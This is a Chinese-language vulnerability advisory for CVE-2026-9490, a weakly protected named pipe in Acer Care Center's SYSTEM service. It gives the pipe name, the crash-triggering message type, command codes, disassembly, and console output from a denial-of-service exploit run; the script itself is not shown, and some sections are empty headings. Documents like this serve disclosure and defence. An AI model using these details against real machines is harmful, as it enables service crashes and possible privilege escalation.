CVE ID: CVE-2026-9490
研究者: Vo Duc Thang (ugvxb)
致谢: https://community.acer.com/en/kb/articles/19668
1. 执行摘要
在 Acer Care Center 服务(ACCSvc.exe)中发现了一个严重的安全漏洞。该漏洞允许任何经过身份验证的本地用户使系统服务崩溃(拒绝服务),并可能通过一个安全保护薄弱的命名管道接口提升权限。
该服务以 SYSTEM 权限(LocalSystem)运行,暴露出一个命名管道,其访问控制过于宽松,向所有经过身份验证的用户授予了读、写和执行权限。
2. 漏洞详情
2.1 受影响组件
| 属性 | 值 |
|---|
| 产品 | Acer Care Center |
| 组件 | ACCSvc.exe(ACC 服务) |
| 服务名称 | ACCSvc |
| 安装路径 | C:\Program Files (x86)\Acer\Care Center\ |
| 服务账户 | LocalSystem(NT AUTHORITY\SYSTEM) |
| 启动类型 | AUTO_START |
| 命名管道 | \.\pipe\treadstone_service_LightMode |
2.2 漏洞 #1:拒绝服务
描述
ACCSvc 服务创建了一个命名管道,其安全描述符薄弱,允许任何经过身份验证的用户连接并发送消息。当向该管道发送特制消息(消息类型 0x03)时,服务会崩溃并退出,代码为 1067(ERROR_PROCESS_ABORTED)。
安全描述符(SDDL)
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)
SDDL 分析
影响
没有任何特殊权限的标准用户可以终止 ACCSvc 系统服务,导致 Acer Care Center 功能不可用。
2.3 漏洞 #2:潜在本地权限提升
描述
同样薄弱的命名管道 ACL 允许经过身份验证的用户发送命令消息,从而触发服务通过 CreateProcessAsUserW 执行启动器应用程序。
命令代码
| 命令 | 十六进制值 | 目标可执行文件 |
|---|
| 0x19065 | 102501 | ACCAPPLauncher.exe |
| 0x19066 | 102502 | ACCSWALauncher.exe |
| 0x19067 | 102503 | ACCFixpackFolderCleaner.exe |
3. 技术分析
3.1 二进制分析
| 属性 | 值 |
|---|
| 文件 | ACCSvc.exe |
| 类型 | PE32+ 可执行文件(控制台)x86-64 |
| 分析工具 | Radare2 |
| 入口点 | 0x14000fd4c |
3.2 已识别的关键函数
3.3 命名管道创建参数
Pipe Name: \\.\pipe\treadstone_service_LightMode
dwOpenMode: 0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode: 0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances: 255
nOutBufferSize: 512
nInBufferSize: 512
nDefaultTimeOut: 1000ms
3.4 命令分发逻辑
0x140008b1a mov ebx, dword [rdx + rcx] ; Read command
0x140008b1d lea eax, [rbx - 0x19065] ; Subtract base
0x140008b23 cmp eax, 2 ; Check range
0x140008b26 ja 0x140008bde ; Jump if invalid
4. 利用结果
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_CREATE_PIPE_INSTANCE
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL
RW BUILTIN\Administrators
FILE_ALL_ACCESS
C:\Users\thang\Downloads\Acer>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ACC Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1067 (0x42b)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
结果:标准用户成功使 SYSTEM 服务崩溃!
5. 风险评估
5.1 CVSS v4.0 评分
| 指标 | 值 |
|---|
| CVSS 4.0 向量 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M |
| CVSS 基础分数 | 6.8(中危) |
5.2 CWE 分类
6. 免责声明
本 PoC 仅供教育和授权安全研究之用。作者对任何误用行为不承担任何责任。未经授权的利用行为是非法的。